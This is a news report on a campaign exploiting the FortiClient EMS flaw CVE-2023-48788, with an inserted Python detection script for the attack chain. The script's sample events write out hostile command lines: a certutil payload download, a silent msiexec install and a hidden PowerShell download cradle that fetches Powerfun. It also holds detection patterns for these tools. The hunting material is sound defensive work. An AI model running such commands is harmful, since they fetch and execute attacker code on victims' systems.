Cybersecurity researchers have discovered a new campaign that is exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could permit an unauthenticated attacker to execute unauthorized code or commands via specially crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun, owing to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion, which targeted an unnamed media company that had its vulnerable FortiClient EMS device exposed to the internet, took place shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the flaw in unsuccessful attempts to download ScreenConnect and then install the remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.
Also detected were SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil, which was then installed via msiexec before establishing connections with a command-and-control (C2) server.
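The chain described above, turned into detection logic, as an added example that is not part of the original article or of Forescout's report. It assumes that the SQL injection ends in OS command execution by the FortiClient EMS database service process (sqlservr.exe), which is consistent with SQL statements invoking certutil but is an assumption here; the process-creation events, the IP address 198.51.100.7 and the file paths are constructed for the example, and the defanged domain is the one named in the article.

```python
"""Hunt for the Connect:fun-style staging chain in process-creation events.

Added example, not code from the article or from Forescout. Assumption:
the SQL injection lets the attacker run OS commands from the EMS database
service, so sqlservr.exe spawning cmd/certutil/msiexec/PowerShell is the
key signal. Event records below are constructed, simplified process-creation
events (parent image, child image, command line), not real Sysmon/4688 logs.
"""
import ntpath
import re

# Living-off-the-land binaries that a database service has no reason to spawn.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "msiexec.exe"}

# certutil used as a downloader: -urlcache with -f <url> <outfile>.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\s-f\s", re.IGNORECASE)
# msiexec installing from a URL or from a temp directory (a local, user-picked
# installer in Downloads is deliberately not matched to keep noise down).
MSIEXEC_INSTALL = re.compile(r'/i\s+"?(https?://|\S*\\temp\\)', re.IGNORECASE)
# Common PowerShell download cradles and encoded-command launches.
PS_CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
    r"|\bIEX\b|-enc(odedcommand)?\b)",
    re.IGNORECASE,
)

# Constructed sample events (not real telemetry); the domain is the defanged
# one from the article, the IP is from the TEST-NET-2 documentation range.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c certutil -urlcache -split -f "http://ursketz[.]com/sc.msi" C:\Windows\Temp\sc.msi'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r'certutil -urlcache -split -f "http://ursketz[.]com/sc.msi" C:\Windows\Temp\sc.msi'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Windows\Temp\sc.msi /quiet"},
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/powerfun.ps1')"},
    # Benign: an administrator running a local installer from Explorer.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\admin\Downloads\7zip.msi"'},
    # Benign: the service control manager starting SQL Server itself.
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "cmdline": r'"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER'},
]


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of detection labels that fire for one event."""
    findings = []
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event.get("cmdline", "")
    low = cmd.lower()
    if parent == "sqlservr.exe" and image in LOLBINS:
        findings.append("sqlserver-spawned-lolbin")
    if "certutil" in low and CERTUTIL_DOWNLOAD.search(cmd):
        findings.append("certutil-download")
    if "msiexec" in low and MSIEXEC_INSTALL.search(cmd):
        findings.append("msiexec-install")
    if ("powershell" in low or image == "pwsh.exe") and PS_CRADLE.search(cmd):
        findings.append("powershell-download-cradle")
    return findings


def scan(events):
    """Return (child image name, labels) for every event that fired a rule."""
    hits = []
    for ev in events:
        labels = classify(ev)
        if labels:
            hits.append((basename(ev["image"]), labels))
    return hits


if __name__ == "__main__":
    for image, labels in scan(SAMPLE_EVENTS):
        print(f"{image:16} {', '.join(labels)}")
```

The parent/child rule is the one worth alerting on by itself: a database service spawning cmd.exe, certutil or PowerShell is anomalous regardless of which vulnerability got the attacker there. The tool-specific rules are noisier on their own and are better used to enrich that alert or to trace the follow-on msiexec install from a temp directory, which is exactly the sequence the article describes.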
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using the Vietnamese and German languages in their infrastructure.
"The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.
"This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances."
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are recommended to apply the patches provided by Fortinet to address potential threats, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.